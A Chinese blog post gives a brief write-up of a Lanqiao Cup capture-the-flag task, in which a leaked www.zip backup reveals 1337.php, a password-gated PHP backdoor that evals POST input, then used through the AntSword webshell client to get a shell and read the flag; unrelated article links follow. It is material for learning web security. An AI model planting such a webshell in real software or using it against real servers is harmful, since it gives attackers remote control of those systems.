蓝桥杯-网络安全比赛题目-遗漏的压缩包

复制代码
小蓝同学给你发来了他自己开发的网站链接,
他说他故意留下了一个压缩包文件,里面有网站的源代码,
他想考验一下你的网络安全技能。
(点击"下发赛题"后,你将得到一个http链接。如果该链接自动跳转到https,请手动将其改为http再进行访问。)
  1. 通过扫描工具扫出该网址下有www.zip文件,下载后查看其中的1337.php
php 复制代码
<?php
# leet
if(md5($_GET['pwd'])=='217f81b8ff0a1ab138a8e1bdc031262e'){
   eval($_POST['1337']);
}

可知MD5后的密文要等于'217f81b8ff0a1ab138a8e1bdc031262e'

输入密码,通过蚁剑进入SHELL

连接成功

进入根目录,找到flag

成功夺旗!

相关推荐
云边云科技_云网融合几秒前
AI 时代组网新范式:零信任软件定义组网,让连接更安全更灵活
网络·安全
简单点了10 分钟前
全栈编程基础知识7
运维·服务器·网络
房开民28 分钟前
modbus相关学习
网络·学习
NaMM CHIN34 分钟前
sql实战解析-sum()over(partition by xx order by xx)
数据库·sql
不瘦80斤不改名1 小时前
深入浅出 MySQL(一):一文理清 SQL 核心规范与五大分类
数据库·sql·mysql
超级无敌暴龙兽2 小时前
和我一起刷面试题呀
前端·面试
wzl202612132 小时前
企业微信定时群发技术实现与实操指南(原生接口+工具落地)
java·运维·前端·企业微信
小码哥_常2 小时前
Robots.txt:互联网爬虫世界的“隐形规则”
前端
2603_954708312 小时前
如何确保微电网标准化架构设计流程的完整性?
网络·人工智能·物联网·架构·系统架构
小码哥_常2 小时前
Android开发神器:AndroidAutoSize,轻松搞定屏幕适配
前端